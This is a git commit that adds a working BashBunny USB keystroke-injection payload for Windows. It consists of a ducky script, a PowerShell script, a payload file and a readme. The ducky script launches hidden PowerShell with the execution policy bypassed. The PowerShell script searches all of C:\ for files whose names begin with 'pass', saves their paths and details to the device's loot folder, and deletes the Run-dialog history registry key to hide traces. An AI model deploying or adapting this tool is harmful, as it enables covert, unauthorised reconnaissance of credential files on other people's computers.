Added FileInfoExfil payload (#76)

* Scan for files that contain a specific phrase and exfil info about them * Delete FileInfoExfil * Create FileInfoExfil * Delete FileInfoExfil * Scans system for files beginning with a specific phrase and exfils data from them * Delete ducky_script.txt * Delete p.bat * Delete payload.txt * Exfil file information to the loot folder Exfiltrates file information of files that contain a specific phrase, including if it is a directory, the file path and file size (in KB) to the loot folder of the BashBunny. * Delete p.ps1 * Add files via upload * Create readme.md * Delete readme.md * Create readme.md * Update payload.txt * Update readme.md
2025-10-29 16:58:25 +00:00 · 2017-04-07 08:18:48 +01:00 · 2017-04-07 08:18:48 +01:00 · 6542907c6e
commit 6542907c6e
parent 217dee5249
4 changed files with 139 additions and 0 deletions
--- a/payloads/library/FileInfoExfil/ducky_script.txt
+++ b/payloads/library/FileInfoExfil/ducky_script.txt
@ -0,0 +1,16 @@
+REM Title: FileInfoExfil
+REM Creator: A_SarcasticGuy 
+REM Target: Windows
+REM Version: 1.0
+
+DELAY 500
+
+GUI r
+
+
+DELAY 1000
+
+
+STRING powershell -windowstyle hidden -ExecutionPolicy ByPass ".((gwmi win32_volume -f 'label=''BASHBUNNY''').Name+'payloads\p.ps1')"
+
+ENTER
--- a/payloads/library/FileInfoExfil/p.ps1
+++ b/payloads/library/FileInfoExfil/p.ps1
@ -0,0 +1,36 @@
+#Creator: A_SarcasticGuy
+#Title: FileExfilInfo
+#Target: Windows
+
+#Check if CapsLock key is enabled
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
+
+#Get the drive letter
+$n = (gwmi win32_volume -f 'label=''BASHBUNNY''').Name
+
+#Create directory in loot folder to store file
+mkdir $n\loot\Exfil\$env:computername
+
+#Find files beginning with phrase "pass*" in the directory (and sub-directories) of "C:\" ("pass*" and "C:\" are defaults, and can be changed to suit)
+forfiles /P "C:\" /s /m "pass*" -c "cmd /c echo @isdir @fdate @ftime @path @fsize" >> $n\loot\Exfil\$env:computername\$(get-date -f dd-MM-yyy-hh-mm-ss).txt
+
+#Delete registry key to remove run dialog history
+REG delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+Sleep 10
+
+#Eject Bunny when exfil is completed as search time can vary
+$Eject = New-Object -ComObject Shell.Application
+$Eject.NameSpace(17).ParseName($n).InvokeVerb("Eject")
+
+#N.B Bunny will not eject if still in use, and scans can take quite a large amount of time, for example if scanning a full Hard Disk.
+
+#Close Powershell process, should it still remain open
+$host.SetShouldExit(0)
--- a/payloads/library/FileInfoExfil/payload.txt
+++ b/payloads/library/FileInfoExfil/payload.txt
@ -0,0 +1,60 @@
+#Title: FileInfoExfiltrator
+#Author: A_SarcasticGuy
+#Version: 1.0
+#Target: Windows
+#
+#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan.
+#
+#	Options: Search Directory: Find in p.bat (default c:/)
+#	 	 Search criteria: Find in p.bat (default "pass*")
+#
+#	Purple LED..................Script Started
+#	Yellow LED..................Ducky Script Started
+#	Red LED.....................Failed to run Ducky Script, see log file
+#	
+#	NOTE: p.ps1 MUST be in loot/payloads/ for this to work.
+#
+
+LED B R
+
+ATTACKMODE HID STORAGE
+
+
+
+# Set language
+QUACK SET_LANGUAGE gb
+
+
+# Source bunny_helpers.sh to allow the value fo SWITCH_POSITION to be returned
+source bunny_helpers.sh
+
+
+
+if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
+    
+
+#Call ducky script  
+LED R G
+
+ 
+QUACK ${SWITCH_POSITION}/ducky_script.txt
+    
+    
+QUACK DELAY 10000
+
+LED R G B
+
+else
+  
+  
+LED R
+ 
+
+#Red LED if unable to load script
+echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
+      
+  
+exit 1
+
+
+fi
--- a/payloads/library/FileInfoExfil/readme.md
+++ b/payloads/library/FileInfoExfil/readme.md
@ -0,0 +1,27 @@
+## Exfiltrate File Information
+
+Author: @A_SarcasticGuy     
+Target: Windows     
+Version: Version 1.0
+
+## Description
+
+Exfiltrate file information if they start with a specific passphrase, and once complete the Bunny should be ejected
+
+NOTE: The Bunny will only be ejected when it is not in use, so if the scan is still continuing it will fail to eject
+
+## Configuration
+
+HID STORAGE
+
+## Requirements
+
+p.ps1 file MUST be in /payloads folder.
+
+## STATUS
+
+| LED              | Status                                |
+| ---------------- | ------------------------------------- |
+| Purple           | Script Started                        |
+| Yellow           | Ducky Script Started                  |
+| Red              | Failed to find Ducky Script           |